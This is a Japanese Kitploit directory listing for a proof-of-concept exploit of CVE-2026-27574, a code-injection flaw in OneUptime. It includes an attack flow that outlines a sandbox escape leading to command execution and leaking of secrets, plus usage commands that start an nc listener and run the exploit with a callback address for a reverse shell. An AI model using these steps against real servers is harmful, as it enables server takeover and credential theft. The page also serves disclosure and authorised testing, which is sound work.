Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/mbanyamer/cve-2026-27574-oneuptime-rce
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubmbanyamer/cve-2026-27574-oneuptime-rce

CVE-2026-27574-OneUptime-RCE

CVE-2026-27574の概念実証エクスプロイト。OneUptimeにおける重大なコードインジェクションであり、リモートコード実行と環境変数の漏洩を可能にします。

リポジトリを見る
16ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-27574-OneUptime-RCE

Author Role Country Platform Vulnerability CVE CVSS Status

概要

CVE-2026-27574 の概念実証エクスプロイト – OneUptime < 10.0.0 における重大なコードインジェクション脆弱性(CWE-94)で、プローブコンテキストでの任意の JavaScript 実行を可能にし、完全な**リモートコード実行(RCE)**と機密の環境変数の漏洩につながります。

修正バージョン: OneUptime 10.0.0(isolated-vm への移行)

エクスプロイト種別: リモート
認証: 低権限(登録済みのプロジェクトメンバーであれば誰でも)
影響: サーバー完全侵害、認証情報の窃取、クラスター乗っ取り

攻撃フロー図

root@kitploit:~
flowchart TD
    A[開始] --> B[登録を開く]
    B --> C[新しいアカウントを登録]
    C --> D[新しいプロジェクトを作成]
    D --> E[ProjectMember ロールを取得]
    E --> F[カスタム JavaScript モニターを作成]
    F --> G[悪意のある vm エスケープペイロードを注入]
    G --> H[プローブが約60秒ごとにコードを実行]
    H --> I[コンストラクタチェーン経由で vm コンテキストをエスケープ]
    I --> J[process と child_process にアクセス]
    J --> K[システムコマンドを実行]
    J --> L[環境変数を漏洩]
    K --> M[/etc/passwd、id、hostname などを読み取る]
    L --> N[ONEUPTIME_SECRET、DB/Redis パスワードなどを抽出]
    M --> O[完全な RCE を達成]
    N --> O
    O --> P[任意: リバースシェル / データ流出]
    P --> Q[終了 - システム侵害]

この PoC の機能

  • アカウントの自動登録
  • プロジェクトの作成
  • 悪意のある JavaScript モニターの作成
  • 環境変数の漏洩
  • 基本的なコマンド実行の証明
  • 任意のリバースシェルペイロード(コメントアウト済み)

使用方法

root@kitploit:~
# リスナーを起動(リバースシェルを使用する場合)
nc -lvnp 4444

# エクスプロイトを実行
python3 exploit.py http://target:3002 --lhost YOUR_IP --lport 4444

要件

  • Python 3.6+
  • requests ライブラリ(pip install requests)

法的・倫理的注意事項

このコードは教育目的および許可されたセキュリティテスト専用に提供されています。
所有していない、または明示的なテスト許可を得ていないシステムに対する不正使用は、違法かつ非倫理的です。

参考情報

  • GitHub Advisory GHSA-v264-xqh4-9xmm
  • パッチコミット

Mohammed Idrees Banyamer によって開発 • ヨルダン • @banyamer_security

ツールをダウンロード